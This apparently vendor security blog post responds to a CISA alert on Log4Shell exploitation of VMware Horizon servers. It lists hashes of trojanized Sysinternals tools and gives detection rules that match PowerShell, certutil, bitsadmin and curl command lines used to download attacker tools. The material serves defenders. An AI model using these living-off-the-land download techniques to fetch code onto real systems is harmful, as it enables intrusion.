Response to US-CERT Alert (AA22-174A): Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems 

In response to US-CERT Alert AA22-174A, AttackIQ has released new malware transfer scenarios to the platform and recommends validating security controls using previously released scenarios addressing Log4Shell and the VMware CVE-2022-22954 vulnerability.   Read More

Sectors Targeted: Defense Industrial Base, Financial Services, Education, Hospitality 

On 2022 June 23, the Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) released a joint Cybersecurity Advisory (CSA) to alert defenders that state-sponsored advanced persistent threat (APT) actors continue to exploit CVE-2021-44228 (Log4Shell) in unpatched VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access. 

Multiple threat actors reportedly began exploiting Log4Shell in December 2021 to deliver trojanized Sysinternals tools that loaded encrypted malware payloads on compromised systems. The report indicates that one of the victims had also been compromised using another VMware vulnerability, CVE-2022-22954, that can result in remote code execution. 

Trojanized Sysinternals Tools 

To assist customers with protecting their environment from these attacks, AttackIQ has released a new assessment based on the Ingress Tool Transfer (T1105) technique, that reproduces the inbound transfer of the actor’s tools and malware to the customer environment. These scenarios test customer’s network and endpoint security controls designed to prevent the introduction of known malicious files to networks and devices.  

This assessment covers the following trojanized samples: 

Sample Name  Hash 
Sysinternals Disk Usage Tool  4a3f79d6821139bc1c3f44fb32e8450ee9705237 
Sysinternals PsPing Tool  33638da3a83c2688e1d20862b1de0b242a22e87c 
Sysinternals LogonSessions Tool A  76f2c5f0312346caf82ed42148e78329f8d7b35a 
Sysinternals LogonSessions Tool B  6a87d8df99ea58d8612fa58a58b1a3a9512f160e 

Detection Process 

It is worth mentioning that at the moment of the US-CERT Alert, it is unclear exactly how the ingress tool transfer was carried out by the threat actors. The malicious Sysinternals tools could be uploaded to the victim machine in two different ways: via exploitation of Log4shell, or by accessing the system after exploitation, and transferring the tools over by using living off the land binaries and scripts.  

In the event of an ingress tool transfer via exploitation, then we would recommend leaning on Anti-Virus products to prevent and alert on these malicious Sysinternals tools by adding these binaries to the global blacklist. Additionally, we encourage that VMWare Horizon systems are placed in a policy which acts to quarantine based off static and dynamic analysis.  

In the event of an ingress tool transfer using living off the land binaries and scripts, we have provided some detection details that may be used in EDR/SIEM products to alert and/or prevent on the observations of the below examples:  

PowerShell Example:  

xProcess Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)  

Certutil Example:  

Process Name == Certutil.exe
Command Line Contains (“-urlcache” AND “-f”)

Bitsadmin Example:  

Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)

Curl Example:  

Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)

 Additionally, downloads of file transfer utilities from legitimate sites should be scrutinized to ensure the requests were made by authorized users.  

 Mitigation Policies 

Ensure that VMWare Horizon Systems are patched for log4shell in accordance with VMWare Security Advisories 

Additionally, it is recommended that non-administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This can help prevent malicious usage of these tools on end user accounts.  

Network Indicators of Compromise 

The US-CERT identified multiple IP address indicators of compromise (IOCs)  used by the threat actors for their command-and-control infrastructure. A new IOC Replication scenario has been released that will attempt to make web requests directly to the IP addresses identified in both the alert and related malware analysis reports. The infrastructure is no longer actively controlled by the threat actors so the connections should be rejected, however this scenario can be used to validate watchlist and blocklist controls in network appliances by looking for attempted access requests to the indicators. 

 Log4Shell 

When Log4Shell was first discovered, AttackIQ quickly released multiple scenarios and an attack graph that emulated common post-compromise activities from threat actors exploiting that vulnerability. Our blog detailing those scenarios along with recommended defensive actions can be found here. 

CVE-2022-22954 VMware Remote Code Execution Vulnerability 

AttackIQ has also previously released both atomic and network control validation scenarios for customers to test security controls against the VMware vulnerability that allows for remote code execution. Customers can find those scenarios in the AttackIQ platform by searching for:   

  • CVE-2022-22954 VMware Workspace ONE Access Template Injection 
  • PCAP Replay – CVE-2022-22954 VMware Workspace ONE Access Template Injection 

The Adversary Research Team at AttackIQ is currently reviewing additional details about the malicious activity reported by US-CERT and will be releasing an advanced attack graph, in the coming days, that will emulate the actor’s post compromise behaviors in a broader kill chain.   

In summary, AttackIQ’s new assessment will help organizations test their network and endpoint anti-virus controls against known samples used in real attacks. With data generated from continuous testing and use of this assessment, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.  

 

AttackIQ stands at the ready to help security teams implement this assessment and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.